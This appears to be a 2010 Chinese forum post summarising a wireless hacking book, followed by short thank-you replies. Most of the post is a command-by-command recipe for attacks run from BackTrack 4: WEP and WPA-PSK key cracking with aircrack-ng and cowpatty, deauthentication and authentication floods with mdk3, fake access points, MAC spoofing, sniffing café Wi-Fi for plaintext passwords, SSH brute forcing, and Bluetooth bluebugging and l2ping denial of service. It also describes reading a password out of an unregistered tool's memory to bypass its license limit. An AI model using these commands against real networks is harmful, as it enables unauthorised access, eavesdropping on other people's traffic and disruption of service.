查看: 10943|回复: 35

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3719

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
TG-NET
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。7 a7 ]! a1 Y$ I* p+ v
0 u5 ~- A0 l1 Q: y) t
以下所有操作均在BackTrack 4中进行。
# X5 m% |. F& I; ]* e8 ^9 Y. k# V+ N8 ?" P0 O. k( I) ?4 t* W1 @
- P( Z+ i" Y" B
无线WEP加密P解:
9 v4 g3 e9 M. z% u: n% V# @$ R# J; h0 X" E- D1 n8 s! [
注入P解:
/ p9 F0 q/ G; K& M0 w4 K* i. o- V& w
: c/ f4 d: t$ Y7 Gifconfig" d6 j. m% \8 b5 ^

9 n$ p9 `! @: C& G/ |* Cifconfig –a- D, r8 w9 r* d' Q( j- \8 v9 ~3 l, K

. t$ O7 c, l) `# J7 Lifconfig wlan0(无线网卡) up  z2 r9 n+ \; S" L4 R

) r9 ]6 e7 u( iairmon-ng start wlan0: n* i; b; U3 I- q- F

. w3 m! j- k6 _" J8 X, ~airodump-ng mon0: d, w% s8 T# f" o
# U/ b5 d9 j, D$ W% j9 y8 ?% i5 Q- T" q8 O9 p
airodump-ng --ivs –w ivsfile –c 频道 mon0或
; U4 p# Z" B( {+ c1 L3 b
) G3 a' l/ P( ?& D" {( {airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
& b9 a4 t" i1 |1 @) U0 {: i, }0 F. C( L* j. f
aireplay-ng -3 –b BSSID –h Station mon0; f* b8 f  K7 O
- \9 N4 j) F( T
aircrack-ng ivsfile-01.ivs: s! k& x) r- ^, O. |, `! D
8 R. D- J, u5 \9 q2 h
虚连接P解(适用于无客户端连接APP解)
' l- X. u% p& D! y8 z
0 ?( i8 j+ {; @- Cifconfig
8 n/ [  N6 E7 O: [) Q+ Q& c4 h+ n
ifconfig –a
4 \! P' \0 ~2 K; Z/ n& p
/ P/ u. o) m. i* h( W# t" Nifconfig wlan0(无线网卡) up% k3 z+ b  v9 y* W5 b( V
6 V# d' M& M/ h! |; @
airmon-ng start wlan0
. j( }1 H8 P+ Y1 ?0 u& t5 g. P( v' E) D! K: ~
airodump-ng mon05 N$ V! R& v2 w  Z6 u$ q
* t. ]  K, F) K8 p; a. F/ _
airodump-ng --ivs –w ivsfile –c 频道 mon0或
1 C+ Q# L9 h6 ]
: E( b* N: O7 `( p2 D2 _airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon05 L5 q+ s$ E5 @7 T+ K) A8 c' H

. I/ U2 s+ P8 Z4 o( ?) |& raireplay-ng -1 0 –e SSID –a BSSID –c Station mon0% z# [8 N  h6 Z" X3 W5 @

( h  ^# ?* M! y5 ^# |2 f/ yaireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0
, A5 e6 {7 y% n. y; u7 D( X: s! a- h: h3 f, I" B. I
aircrack-ng ivsfile-01.ivs1 A: \& f! i0 ~1 }

/ k" K7 M4 t/ p6 o/ p: l, @
1 U: f+ T2 @4 `! i) x5 y还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。. d2 \3 \5 ], B

  y7 l* Q. R" V* c( S  ?3 c' V0 ~, D/ T' y; z2 y  D
WPA-PSKP解
4 c' R; s5 f0 R( G+ {# I# e& L+ J5 j% Y# P5 }, G9 T( d% Q
ifconfig
: J' Q) T) a( E1 k. g) Y0 v7 [- }; u* ^* \" w. _
ifconfig –a9 G! Q& B1 e9 ^! R- H7 L. n+ ]

/ D3 r& A- W) c* j7 pifconfig wlan0(无线网卡) up
. h2 K/ [  E: ]) Z( a1 |
9 a, p5 \: @& y9 f$ @. Z; cairmon-ng start wlan0
$ m7 J; V8 S+ l, }+ W( Y% G$ Q4 m: Z$ g& h
airodump-ng mon0
2 ?' J1 A& {) [8 |/ t  |! ?- I% z0 O& v( k' k5 I
airodump-ng –w capfile –c 频道 mon0& U/ g" j; m1 p

8 r* q4 k7 N  u3 X" d  g. Paireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包5 _! V" L, Y) p5 u+ b; w- F8 p
) d! h- d" i9 e1 }) L
aircrack-ng –w Dic capfile-01.cap或
# c/ h9 v  O8 g: v  G. @. ^$ B  T5 P  N: {# n
cowpatty –f Dic –r capfile-01.cap –s SSID
/ {; q% V0 q5 T0 S* i
% h$ T; S4 R  a% _; c6 G) Mcowpatty –d HashTable.Hash –r capfile-01.cap –s SSID3 g; A) r2 ~4 W, @; j
) O) t3 F2 c6 N! x8 e1 z2 \
傻瓜式P解软件SpoonWPA。/ |6 ]( g: a0 I

6 D5 ^+ |, x6 H2 Y$ h- ~* m" yBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst
, ^% I' O7 ]/ X0 K: o1 V, g# S- n8 j3 X# Q* d

" S5 L. C+ n. N7 b  r2 P6 O" T8 J字典文件的生成和上传
$ M2 z4 t- x  y- c! Y  u
& U& ]+ |* M3 d2 w0 x/ x& T& h) }8 e在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。* D6 D% b8 M! L1 p

  [: q3 }$ G' t: X9 K3 O# c) k; K1 U; K/ \4 b! e* i) T
BT4下开启Tftp:Services—TFTPD—start TFTPD8 N& J: b! f+ U9 a, b7 j* Q# d

$ D; d7 E, W2 H+ g3 y在Windows的CMD中运行 tftp –i IP put **.dic
5 }; n- C7 x4 W5 c) G' B& ]& [% @' M3 I, D7 v% `8 \

, f( ?( _* x  k9 f  DBT4下开启SSH:Services—SSH—start SSH
; T' P. n/ h& [# V& [8 u
% @% s9 d3 o; v( R/ J6 a" p. n! C* XWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root
; `- f4 j, j% o5 w
  E- H( ]$ I. `5 K3 P" i
1 c/ r9 U% \" ^. P/ E# i1 v+ m. A6 vAP限制MAC时的解决: n8 ]' j: a2 s* d7 I0 @
/ s% Q8 e! _0 e4 j& Z7 h
当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:
2 U/ r" |' i) y; r, [
) N' j3 d: ^8 I5 `' L( Tifconfig wlan0 hw ether NewMAC
0 ^0 j: R) T: V3 r( H, n+ |8 i. k& S* X4 i0 F9 A

8 `/ G4 x3 {( R% g关闭SSID广播的AP探测:' f( b+ y2 Z! K7 @3 _$ x
6 I! V, j9 k! I7 \4 F4 P  Q3 ^
1.     Deauth攻击:
! t; A. b+ V- |* Q( q. q( i+ L% m  a# u: L
airodump-ng mon0
& M( _8 q/ o/ K# d1 Q1 {5 g+ B" @5 r- a' S; F4 o
aireplay-ng -0 10 –a BSSID –h Station mon01 L& s* T# z% G2 |- P/ l

# A1 N2 Q2 F1 c+ P/ @+ R; V2.     抓包分析
4 s# {  g. X0 B# {9 p/ L  a- {; C8 [# k& N( P9 E
Omnipeek
% E* d; j# t: R2 S
2 b4 V2 D* b; l6 N: X$ Z9 ITcpdump –n –e –vvv –i 网卡名$ s2 z1 H+ h. J
, e1 L( y, ]) i/ r5 x$ C% j
3.     暴力P解- g: v7 A: Q- e' S8 q! p

3 l) g, J) e# o9 p# f; H& k; H  vCharon 1.1暴力P解
+ [/ R8 _7 g! v! j& Y5 D2 p" \  z" ?4 y. C8 O$ ^5 A+ Y$ N" Z

# A6 f8 h; k- u* M; F' r无线加密数据包的解密5 N) o# w* J" k+ x  E' D5 v5 q

0 i7 x5 [; ~# Y- L' c. M+ j
0 i! R5 ~+ X" O% p: X使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。5 M6 e; M7 ?2 Z5 @
  m: M5 C3 d! B# j2 g2 F/ L. C
FilterNS     DNS解析数据包
/ V/ A8 }3 a5 G. R0 i% ?% ~
( i, y3 y3 W  K0 b5 h  U) BFilter:HTTP    WEB访问数据包2 H+ E. ~/ r4 ?5 r) Q6 q8 ^
  Y) ~, I0 d$ G1 W/ r
Filter:msnms   MSN
) [, v/ I  i1 y  |. h( a& l/ O1 x8 `7 v2 |! ]1 f( t
Ctrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。
3 u; U/ R6 Q4 C/ `% `; w8 S- F$ G$ Q
' v* }$ H  T+ \2 d) X  u0 L; P" u使用airdecap-ng解密:6 t5 \6 D1 {% F+ c+ U

: a% q- e! a$ ?. `Airdecap-ng –b BSSID –e SSID –w 密码 ***.cap4 k  z2 Y- G# Q2 F, x$ e
& M+ x8 I  q( ~$ J) G+ a

+ u* B( ~# k4 r- f* n2 O' ]咖啡馆中无线数据截取(开放式无加密AP)
/ A5 V3 o9 e* e" E8 f) z/ \3 E
! N. T* B; @1 z2 m$ a1.Airodump-ng –w data –c频道 mon0& z8 {1 M4 l. u6 \8 {! m0 Q2 y
9 v4 t* R# m" G9 \0 K
2.使用WireShark打开分析. J+ C& q* E2 l/ ^2 N
# v7 B6 H& @' B) Y
( z4 F# j0 |- ^3 _& F
BT4下的渗透工具:4 h( d  N3 K! U6 P
- S/ L( P" Y# [* ^3 U. X
nmap –sP IP/24        判断C段下存活的主机
( W* G( }/ T: D, b% K. r' x! N& W# N( ~% p* [
nmap –vv –sS IP/24 –p Port    扫描指定端口是否开放
3 s( }2 h& s  ~1 X. X
6 q2 {7 U' m: ?' g8 znmap –vv –sV IP –p port   指定端口的详细信息。。。
7 ~9 x- B! I/ |" P; ?" c% D
* \7 a, \, j3 S* b1 C- t: }. Dnamp –O IP/24    判断主机的系统版本+ F8 d. i) E/ b. I
& M9 C# C& I( R6 f

( p3 I+ j& Z% M- T3 CGUI 版nmap:Zenmap
2 p0 i1 B9 s& _) J7 L1 P2 E' Y& A7 e

6 e+ O. `1 ]2 zAmap使用:amap –B IP port
; P: ?5 |. T  u4 M- U/ K# }6 l, U9 ~! W  q
Nbtscan(扫描Windows网络NetBios信息):# n7 R: _. h* p4 M1 o* U# X3 j. C

2 a  B% M8 `# g' G3 N+ vnbtscan –v –s : IP/24* b" P! ]! J1 w, H" e7 b

& g/ l  l- J# X& h* fnbtscan –r IP
. W9 F7 J) b" r# U
! ~: k  T4 L9 T. O" y- M6 G2 c. C7 L: x1 ^  ~- Q' S9 p5 M
DNSWalk(指定域名的DNS探测):./dnswalk XXX.com.- r. X2 ~% {0 c) T# D
9 t* u$ P  d7 X/ h5 \% `- Z" }& u
3 r/ s" e3 s) a( V
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)2 q& \9 f  M& ~) f0 x+ T2 {# w
6 s- |( }7 \1 i
BruteSSH: ./bruthe.py –h IP –u Username –d Dic
' ?$ U$ C1 x4 a% x' w
* B$ J9 s. \$ vMetasploit3使用
  N+ Z3 l; [: D- O4 v无线D.0.S
: }3 D* p% I5 A3 D9 J& Y& H( {
7 s0 E$ C5 `8 B! x0 ^! }8 }: {, O' v( Z8 O  {" \: H8 A
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
- Y( H" ]3 \1 S9 M$ o
9 p$ [2 I( n' z* @% [- y4 oairmon-ng start wlan0
( G: @4 V) ]$ ?: w( m; b3 y& j$ x* [/ L
airodump-ng mon0
. L2 E$ E/ l( ]3 j* D3 g
" {; @9 f( {0 H) c1 x! H# {+ _, Rmdk3 mon0 a –a BSSID
' V9 ^0 m5 D, p. F1 w1 l$ f3 W4 `$ M$ {7 |- u8 @8 W4 K
对所有的AP攻击:mdk3 mon0 a2 \* [: [! @) H. C' t9 z! O1 u( H

$ d  m5 E/ Q, Y) G3 W0 @3 z" ~* Y" {$ M2 ]+ k: G% L
Deauth Flood 攻击/ Y. Y$ E0 S) n1 ^
' V; {- g- i! D5 ?7 ?: }$ G
mdk3 mon0 d –c Channel4 F+ S% G! l  o0 B3 k  \3 H3 x) j
& k4 c7 q- Z5 h# L& |/ e
图形化D.O.S攻击:Charon
! Y7 ~* b- @2 S4 U( b2 q! b6 A
: H0 V- V# q7 h% @, f+ z
8 [7 M7 L+ S- l- r+ K当受到攻击时,使用Wireshark抓包可以看到异常信息。% [1 H/ Z; T2 _5 d5 u0 ~& C+ w, u

2 R+ B. f3 [/ ?( o2 N7 t
* K4 x- b( b2 E0 {8 W. WWPA-PSK高速P解  L$ ~! L) \4 E

7 X  O* X0 W0 s  i1.       WPA-PSK PMK Hash TablesP解+ Z. Y6 D6 N7 u8 ~: S- A* t. W
1 U5 [* ~# c0 X1 W1 C  T; E( @
Cowpatty –d HashTable.hash –r ***.cap –s SSID: i: L. S/ l; L

. Y, m1 M# H) w6 B0 S  w" L' XHash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
9 g  Z2 t' s( R* q. O7 {: b# b0 Z7 ?# j/ u0 e
2.       GPU辅助高速P解
8 r# T  g" z2 W$ ]. B: j1 {$ X. y; h
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。7 }8 b. v* {* m% k+ {- o$ ~8 p
1 y5 N$ ~2 C) h. B# b$ Q! u
3.       分布式P解
6 W* h& \8 m& S, b; D  P" H1 u" f+ a2 D% e. c5 C% e+ g
# E7 P- t+ T: u/ A
AP的伪造
7 c- [( I% r/ O7 Q4 R8 J
* E4 E, X4 `/ u; [把AP的MAC改成目标AP的MAC
( X* M) Q! R+ ?; x+ z5 L- T' ?! v
4 H0 N$ x& q+ |, \网卡软AP
2 v6 [8 ^6 K3 a! N
" z; C) @9 W5 V
/ N- u* |$ I+ B. @  n% f* _7 g伪造大量虚假AP信号:' J9 u8 ~7 E! P" ?$ L" Z
- ]8 H0 v0 J7 I! w
随机SSID:mdk3 mon0 b –g –c 频道
' r3 w3 C3 f( I
9 {% ^; r, i+ P! t' A% l指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度4 @" u! {" g9 p& T& @9 H
: h8 B2 L# u' E1 j

$ `  J- t( \$ k' ^, x- ?) E, VWar-Driving
  K4 j$ c6 }- f
% i4 ~' H6 g0 u9 y) E! A  R  Q; z热点地图绘制
' [% Y+ G. X, }8 f' k  C% _
5 d  ~6 o" G0 S) [% T; RWindows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。' ?- z2 o1 H, N( v( C$ j  n

& ?- h& B* m6 j, G1 k) ~; |! U2 N: O. }) f, Q- I% ~* G
Netstumble
) F8 ]6 J- }5 N: P+ {; a' k2 E, `! z) v% z/ `

9 X: M; g' Z9 k4 c蓝牙Hacking
5 R' z$ Y/ ^3 I5 G/ s; f7 O+ v: s1 p* R7 Y
Windows下的Blue Soleil工具
; R+ p6 j4 a  p
5 K$ T" d8 i0 x- s6 ^BT4:, a6 n. e* E. U) P5 {: `. m( p

0 ~1 `9 b/ U" v; c* Chciconfig 查看蓝牙适配器4 S/ N  c$ ]: G/ s0 A' `
  K1 j! t1 d3 V* C+ a1 }8 U/ I
hciconfig hci0 up 载入蓝牙适配器( i6 m  g+ B8 _/ J* R

1 C9 P* R  J5 l! h# Ehciconfig hci0 class 蓝牙适配器详细信息
0 N/ P$ E2 N6 L6 S  C+ X3 L8 b4 i( k4 i
6 j' P, N7 f% ?1 [: M
hcitool(扫描蓝牙)9 J- m5 y6 }2 @' r
) J% d( X: H6 y5 i( q5 k
hcitool –i hci0 scan6 e& ~: F! v2 V! ]8 D. H- y! M3 z% i

' ]# t9 x9 j& _) `1 g1 f* b1 rBTscanner(扫描蓝牙)
6 J& A. ~2 M3 Q7 F' L$ ^7 X
, R4 {3 N7 C; s: e" }  _. e$ \, ?3 G4 P" x& @% B
蓝牙攻击:
5 e/ k; \& a" y5 P4 }- `  K8 m2 Y: A+ `! o1 T: B- y
BlueBugging (适用于BlueTooth V1.1的手机)) ]6 m3 @! D' `3 W/ Z' A
. U1 ^4 q7 I; N) s  _6 O2 T) |' Z) g
Bluebugger工具:# k& b: O  j" J
- ~/ [9 F+ X9 ^" S
Bulebugger –a HD_Addr info6 E" u6 c5 g+ L% z' Y

. a& d3 W7 L$ B% [1 w! K- \6 c/ X! c* U4 P! C& m3 c  m/ i& C! U
BlueJacking
$ Y* K5 d' @% r; o& r
5 j: n. E; S  u5 h/ }; H4 L实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。3 e5 v9 ?& U) w5 ^6 E- g

1 G. {1 k! Z- ?, K
* o$ b: p- f( ~- k( lHD_Addr修改:
9 V" D( W" w0 }7 c1 t
- @# o5 Q  s; \Bdaddr工具
7 j. S0 F' g& ^  D8 F3 }4 V- a6 _, o) q( `/ R
bdaddr –i 蓝牙设备名 新HD_addr
) p7 [0 ]# l* b4 }8 p+ H
; L9 i- Z: `' H
7 m' M! \. \! Y' o1 h蓝牙D.O.S6 Q- O& a  L5 z
% [$ U; ?. i9 l& h
l2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务; S4 `2 ]3 K4 x+ a+ A+ z

* }5 Z- f3 i# i8 _4 Lhciconfig
9 B2 m0 j4 h$ P' z# O' n
) A/ S5 c# Z/ e3 D% ^' W. Ghciconfig hci0 up
/ l) \& |& M. {6 ?& P) J  U: t: B- @9 S5 g2 n- \3 S; @( y
hcitool –i hci0 scan
  V: y6 B! x" E  Z6 `) ~9 I% C) I7 t7 I6 K+ e* c; C
l2ping –s 10000 –目标MAC
8 w# q$ P  v& J7 T. p6 ]4 F8 N. ~7 O  ?) S

  {, G; |6 K8 h3 c6 u不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)
2 `9 }% @& k4 J+ ]$ x
- H9 m2 B1 m! H./fang –r ************-############ -s
9 f  M5 Q! }4 h2 K% [# T
* d& f, Q2 V6 m3 s1 t3 A暴力P解************-############的蓝牙设备
0 {- d+ i3 U5 {6 p( ]
5 _3 G/ k, ]+ k- S- D6 V./fang –l 各厂商BD_Addr分配1 b) ^$ }' `$ ^: j8 ^6 e

- L& R2 }# v7 V! p# P( o$ C& O: Q" C3 `" v+ o
WifiZoo使用$ b- m  F, a; S# ^: h

/ j. a7 V& a8 Z7 d( v8 R/ F) j./wifizoo.py –c Capfile
' ?$ Y) d7 K2 m" ~' H6 [- o% d" ~' t; z, }7 v. @2 M1 Z
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

835

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

140

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2266

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

257

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

909

积分

中尉

签到天数: 13 天

[LV.3]偶尔看看II

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。* x" ~' C/ d% `
借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的2 {9 D* T7 a; d: l
呵呵 其实也不贵 21块 快递再一点
1 Z& I& D. c* L  O3 Q' _5 @: [我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

Archiver| 手机版| 中国无线门户 ( 粤ICP备11076993 )  |网站地图    小黑屋 | 免责声明

GMT+8, 2017-2-20 07:27

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表